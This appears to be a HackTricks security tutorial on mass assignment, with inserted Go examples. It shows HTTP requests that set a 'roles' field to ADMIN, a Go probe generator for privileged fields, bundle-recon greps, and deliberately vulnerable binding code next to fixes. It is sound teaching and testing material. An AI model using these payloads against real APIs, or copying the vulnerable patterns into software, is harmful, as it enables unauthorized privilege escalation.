Mass Assignment (CWE-915) – Privilege Escalation via Unsafe Model Binding


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Mass assignment (a.k.a. insecure object binding) occurs when an API/controller accepts user-supplied JSON and binds it straight onto a server-side model/entity without an explicit allow-list of fields. If privileged properties such as roles, isAdmin, status, or ownership fields are bindable, any authenticated user can grant themselves permissions or modify protected state.

This is a Broken Access Control issue (OWASP A01:2021) that frequently enables vertical privilege escalation by setting roles=ADMIN or similar. It commonly affects frameworks that support automatic binding of request bodies to data models (Rails, Laravel/Eloquent, Django ORM, Spring/Jackson, Express/Mongoose, Sequelize, Go structs, etc.).

1) Finding Mass Assignment

Look for self-service endpoints that update your own profile or similar resources you own:

  • PUT/PATCH /api/users/{id}
  • PATCH /me, PUT /profile
  • PUT /api/orders/{id}

Heuristics indicating mass assignment:

  • Responses echo server-managed fields (e.g. roles, status, isAdmin, permissions) even when you did not send them.
  • Client bundles contain role names/IDs or other privileged attribute names used in the app (admin, staff, moderator, internal flags), hinting at a bindable schema.
  • Backend serializers accept unknown fields without rejecting them (a probe with a bogus field returns 200 rather than 400).

Quick test flow:

  1. Perform a normal update using only safe fields and record the full JSON response structure (this leaks the schema).
  2. Repeat the update with a privileged field added to the body. If the response reflects the injected value (rather than the previous server-side value), you most likely have mass assignment.

Example baseline update revealing schema:

http
PUT /api/users/12934 HTTP/1.1
Host: target.example
Content-Type: application/json

{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry"
}

The response reveals privileged, server-managed fields that were never sent:

http
HTTP/1.1 200 OK
Content-Type: application/json

{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry",
"roles": null,
"status": "ACTIVATED",
"filters": []
}

2) Exploitation – Role Escalation via Mass Assignment

Once you know the bindable shape, include the privileged property in the same request, matching the nesting the response showed.

Example: set roles to ADMIN on your own user resource:

http
PUT /api/users/12934 HTTP/1.1
Host: target.example
Content-Type: application/json

{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry",
"roles": [
{ "id": 1, "description": "ADMIN role", "name": "ADMIN" }
]
}

If the role change is not visible right after the response, re-authenticate or refresh tokens/claims so the app issues an admin-context session and exposes the privileged UI/endpoints.
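The two-step flow above (baseline, then probe, then confirm) as an added Go example that is not part of the original page: it diffs the baseline request against the response to list server-managed fields, flags the ones whose names suggest authorization, builds the probe body with exactly one extra property, and checks whether a later response echoes the injected value. The request/response bodies are constructed from the page's samples, the privilegedHints list is a heuristic chosen for this example, and sending the probe over HTTP is left to the caller.

```go
package main

import (
	"encoding/json"
	"fmt"
	"reflect"
	"sort"
	"strings"
)

// Constructed sample traffic for this example (not captured from a real
// target): the baseline PUT body a tester sends and the JSON echoed back.
const baselineRequest = `{"id":12934,"email":"user@example.com","firstName":"Sam","lastName":"Curry"}`
const baselineResponse = `{"id":12934,"email":"user@example.com","firstName":"Sam","lastName":"Curry","roles":null,"status":"ACTIVATED","filters":[]}`

// serverManagedFields returns the top-level keys present in the response but
// absent from the request body. Those are populated server-side and are the
// first candidates to try binding from the client.
func serverManagedFields(requestBody, responseBody []byte) ([]string, error) {
	var req, resp map[string]json.RawMessage
	if err := json.Unmarshal(requestBody, &req); err != nil {
		return nil, fmt.Errorf("request: %w", err)
	}
	if err := json.Unmarshal(responseBody, &resp); err != nil {
		return nil, fmt.Errorf("response: %w", err)
	}
	var leaked []string
	for k := range resp {
		if _, sent := req[k]; !sent {
			leaked = append(leaked, k)
		}
	}
	sort.Strings(leaked)
	return leaked, nil
}

// privilegedHints are substrings that, in a field name, usually mean the field
// gates authorization. Heuristic list chosen for this example.
var privilegedHints = []string{"role", "admin", "permission", "status", "owner", "scope", "verified", "tier"}

func looksPrivileged(field string) bool {
	f := strings.ToLower(field)
	for _, h := range privilegedHints {
		if strings.Contains(f, h) {
			return true
		}
	}
	return false
}

// buildProbe re-sends the baseline body with one extra property, so the only
// difference between baseline and probe is the field under test.
func buildProbe(baseline []byte, field string, value interface{}) ([]byte, error) {
	var body map[string]interface{}
	if err := json.Unmarshal(baseline, &body); err != nil {
		return nil, err
	}
	body[field] = value
	return json.Marshal(body)
}

// probeReflected reports whether the server echoed back exactly the value we
// injected for field: the confirmation step of the test flow.
func probeReflected(responseBody []byte, field string, injected interface{}) (bool, error) {
	var resp map[string]interface{}
	if err := json.Unmarshal(responseBody, &resp); err != nil {
		return false, err
	}
	// Round-trip the injected value through JSON so numbers compare as float64
	// on both sides, matching what Unmarshal into interface{} produces.
	raw, err := json.Marshal(injected)
	if err != nil {
		return false, err
	}
	var want interface{}
	if err := json.Unmarshal(raw, &want); err != nil {
		return false, err
	}
	got, present := resp[field]
	return present && reflect.DeepEqual(got, want), nil
}

func main() {
	leaked, err := serverManagedFields([]byte(baselineRequest), []byte(baselineResponse))
	if err != nil {
		panic(err)
	}
	for _, f := range leaked {
		if !looksPrivileged(f) {
			continue
		}
		// Value shape is guessed from the leaked schema: roles is a list of
		// objects in the page's sample, everything else gets a plain string.
		var guess interface{} = "ADMIN"
		if f == "roles" {
			guess = []map[string]interface{}{{"id": 1, "name": "ADMIN", "description": "ADMIN role"}}
		}
		probe, err := buildProbe([]byte(baselineRequest), f, guess)
		if err != nil {
			panic(err)
		}
		fmt.Printf("probe for %s: %s\n", f, probe)
	}
}
```

Send each probe body with the same PUT as the baseline, then feed the new response to probeReflected with the value you injected; a true result on a self-service route is the finding.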

Notes

  • Role identifiers and structures are often enumerated from the client JS bundle or API docs. Search for strings such as "roles", "ADMIN", "STAFF", or numeric role IDs.
  • If tokens carry claims (e.g. JWT roles), a logout/login or token refresh is usually needed before the new privileges take effect.

3) Client Bundle Recon for Schema and Role IDs

  • Inspect minified JS bundles for role strings and model names; source maps can reveal DTO shapes.
  • Look for arrays/maps of roles, permissions, or feature flags. Build payloads that match the real property names and nesting.
  • Common indicators: role name constants, dropdown option lists, validation schemas.

Handy greps against a downloaded bundle:

bash
strings app.*.js | grep -iE "role|admin|isAdmin|permission|status" | sort -u

4) Framework Pitfalls and Safe Patterns

The weakness arises when frameworks bind req.body directly onto persistent entities. Below are the common mistakes and minimal, safe patterns.

Node.js (Express + Mongoose)

Vulnerable:

js
// Any field in req.body (including roles/isAdmin) is persisted
app.put('/api/users/:id', async (req, res) => {
const user = await User.findByIdAndUpdate(req.params.id, req.body, { new: true });
res.json(user);
});

Fixed (allow-list plus ownership check):

js
// Strict allow-list and explicit authZ for role-changing
app.put('/api/users/:id', async (req, res) => {
const allowed = (({ firstName, lastName, nickName }) => ({ firstName, lastName, nickName }))(req.body);
const user = await User.findOneAndUpdate({ _id: req.params.id, owner: req.user.id }, allowed, { new: true });
res.json(user);
});
// Implement a separate admin-only endpoint for role updates with server-side RBAC checks.

Ruby on Rails

Vulnerable (no strong parameters):

rb
def update
@user.update(params[:user]) # roles/is_admin can be set by client
end

Fixed (strong params, no privileged fields):

rb
def user_params
params.require(:user).permit(:first_name, :last_name, :nick_name)
end

Laravel (Eloquent)

Vulnerable:

php
protected $guarded = []; // Everything mass-assignable (bad)

Fixed:

php
protected $fillable = ['first_name','last_name','nick_name']; // No roles/is_admin

Spring Boot (Jackson)

Vulnerable example:

java
// Directly binding to entity and persisting it
public User update(@PathVariable Long id, @RequestBody User u) { return repo.save(u); }

Fix: map to a DTO that contains only the accepted fields and enforce authorization:

java
record UserUpdateDTO(String firstName, String lastName, String nickName) {}

Then copy the permitted fields from the DTO onto the entity server-side, and handle role changes only in admin-only handlers after RBAC checks. Use @JsonIgnore on privileged fields if needed and reject unknown properties; note that Spring Boot disables Jackson's FAIL_ON_UNKNOWN_PROPERTIES by default, so re-enable it (spring.jackson.deserialization.fail-on-unknown-properties=true) if you want probes for unknown fields to fail with 400 instead of being silently dropped.

Go (encoding/json)

  • Make sure privileged fields use json:"-" and validate with a DTO struct that contains only the allowed fields. Untagged fields are matched case-insensitively by encoding/json, so an untagged IsAdmin binds from "isadmin" or "ISADMIN" too.
  • Consider decoder.DisallowUnknownFields() and post-bind validation of invariants (roles cannot change in self-service routes).
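The Go pattern described in the bullets above, as an added example that is not from the original page: a DTO decoded with DisallowUnknownFields, an entity with json:"-" on Roles/Status, a post-bind invariant check, and, for contrast, an untagged struct showing that encoding/json binds a privileged field from any case variant of its name. The type and function names are my own.

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"reflect"
)

// User is the persisted entity. Roles and Status carry `json:"-"`, so no
// request body can bind them; only an admin-only handler changes them in code.
type User struct {
	ID        int64    `json:"id"`
	Email     string   `json:"email"`
	FirstName string   `json:"firstName"`
	LastName  string   `json:"lastName"`
	NickName  string   `json:"nickName"`
	Roles     []string `json:"-"`
	Status    string   `json:"-"`
}

// UserUpdateDTO is the only shape the self-service PUT accepts.
type UserUpdateDTO struct {
	FirstName string `json:"firstName"`
	LastName  string `json:"lastName"`
	NickName  string `json:"nickName"`
}

// LegacyUser is the unsafe pattern for contrast: an untagged privileged field.
// encoding/json matches untagged names case-insensitively, so "isadmin",
// "IsAdmin" and "ISADMIN" all bind to it.
type LegacyUser struct {
	FirstName string
	IsAdmin   bool
}

var errInvariant = errors.New("self-service update attempted to change protected state")

// decodeUpdate parses a self-service body into the DTO and rejects any key
// outside it, so "roles" or "isAdmin" fail loudly instead of being dropped.
func decodeUpdate(body []byte) (UserUpdateDTO, error) {
	var dto UserUpdateDTO
	dec := json.NewDecoder(bytes.NewReader(body))
	dec.DisallowUnknownFields()
	if err := dec.Decode(&dto); err != nil {
		return UserUpdateDTO{}, fmt.Errorf("reject update: %w", err)
	}
	return dto, nil
}

// applyUpdate copies the allow-listed fields onto a copy of the stored user and
// then re-checks the invariants a self-service route must never violate.
func applyUpdate(stored User, dto UserUpdateDTO) (User, error) {
	updated := stored
	updated.FirstName = dto.FirstName
	updated.LastName = dto.LastName
	updated.NickName = dto.NickName
	if err := checkInvariants(stored, updated); err != nil {
		return stored, err
	}
	return updated, nil
}

// checkInvariants is the post-bind guard: identity, roles and status must be
// unchanged by anything a self-service caller can send.
func checkInvariants(before, after User) error {
	if before.ID != after.ID || before.Status != after.Status || !reflect.DeepEqual(before.Roles, after.Roles) {
		return errInvariant
	}
	return nil
}

// bindEntityDirectly is what a lazy handler does: unmarshal straight into the
// entity. The `json:"-"` tags still protect Roles/Status, but unknown keys are
// silently ignored, which hides probing attempts from your logs.
func bindEntityDirectly(body []byte, stored User) (User, error) {
	u := stored
	if err := json.Unmarshal(body, &u); err != nil {
		return stored, err
	}
	return u, nil
}

func bindLegacy(body []byte) (LegacyUser, error) {
	var u LegacyUser
	err := json.Unmarshal(body, &u)
	return u, err
}

func main() {
	stored := User{ID: 12934, Email: "user@example.com", Roles: []string{"USER"}, Status: "ACTIVATED"}
	// Constructed attacker body: a normal profile edit plus a privileged field.
	body := []byte(`{"firstName":"Sam","lastName":"Curry","roles":["ADMIN"]}`)
	if _, err := decodeUpdate(body); err != nil {
		fmt.Println("strict DTO:", err)
	}
	u, _ := bindEntityDirectly(body, stored)
	fmt.Println("direct bind, roles still:", u.Roles)
	l, _ := bindLegacy([]byte(`{"firstName":"Sam","isadmin":true}`))
	fmt.Println("legacy untagged IsAdmin bound from lowercase key:", l.IsAdmin)
}
```

Use decodeUpdate plus applyUpdate on self-service routes and keep the role-changing path in a separate handler behind a server-side RBAC check; the invariant check is cheap insurance against a future refactor that widens the DTO.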

